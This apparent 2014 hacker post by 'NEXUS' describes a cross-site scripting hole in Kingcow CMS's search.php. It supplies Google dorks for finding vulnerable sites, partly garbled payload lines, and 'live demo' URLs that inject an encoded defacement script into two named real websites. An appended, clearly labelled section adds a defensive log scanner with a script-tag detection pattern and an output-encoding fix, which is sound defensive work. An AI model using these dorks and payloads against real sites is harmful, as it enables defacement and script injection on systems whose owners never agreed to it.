Kingcow CMS Cross Site Scripting

~ Tuesday, 1 July 2014
Dorks:
inurl:"search.php?for="
intext:"Powered by Central" 
* The "for" parameter in search.php is vulnerable to XSS.

Exploits:
">&search_submit=Search
Or, if a normal script string doesn't work, change it from a string to character codes:
">&search_submit=Search
The character codes "String.fromCharCode(72, 97, 67, 107, 101, 100, 32, 66, 121, 32, 78, 69, 88, 85, 83, 32, 33)" spell out "HaCked By NEXUS !", converted using the HackBar add-on for Firefox.



If you don't have HackBar, download it from:
https://addons.mozilla.org/en-US/firefox/addon/hackbar/
Live Demo:
http://hdmixtapes.com/search.php?for=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E&search_submit=Search
http://artnews.org/search.php?for=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083%29%29;%3C/script%3E&search_submit=Search
NEXUS 
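
Added example (not part of the original post and not the CMS's own code): a defender-side check that scans web access logs for search.php requests whose "for" parameter decodes to markup, together with the output-encoding fix. The log lines are constructed, the function names are hypothetical, and it assumes the search term is echoed into an HTML attribute.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (not real traffic). The second request
# reuses the encoded query shape shown in the post's demo URLs.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jul/2014:10:00:01 +0000] "GET /search.php?for=mixtape+2014&search_submit=Search HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jul/2014:10:00:07 +0000] "GET /search.php?for=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097%29%29;%3C/script%3E&search_submit=Search HTTP/1.1" 200 5342',
    '203.0.113.9 - - [01/Jul/2014:10:00:09 +0000] "GET /search.php?for=%2522%253E%253Cscript%253E&search_submit=Search HTTP/1.1" 200 5301',
    '203.0.113.7 - - [01/Jul/2014:10:01:00 +0000] "GET /index.php?for=%3Cscript%3E HTTP/1.1" 200 900',
]

REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Markup indicators: an opening/closing tag, an inline event handler, or the
# String.fromCharCode trick the post uses to avoid quoted strings.
SUSPICIOUS = re.compile(r'<\s*/?\s*[a-z!]|\bon\w+\s*=|fromCharCode\s*\(', re.I)

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are also seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def flag_requests(lines):
    """Return (client_ip, decoded 'for' value) for suspicious search.php hits."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/search.php"):
            continue
        for raw in parse_qs(url.query).get("for", []):
            value = decode_fully(raw)
            if SUSPICIOUS.search(value):
                hits.append((line.split()[0], value))
    return hits

def render_search_box(term):
    """Mitigation (assumed attribute context): HTML-encode the term, quotes included."""
    return '<input name="for" value="%s">' % html.escape(term, quote=True)
```

Encoding at output time is the actual fix; the log scan only shows who has been probing the parameter.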
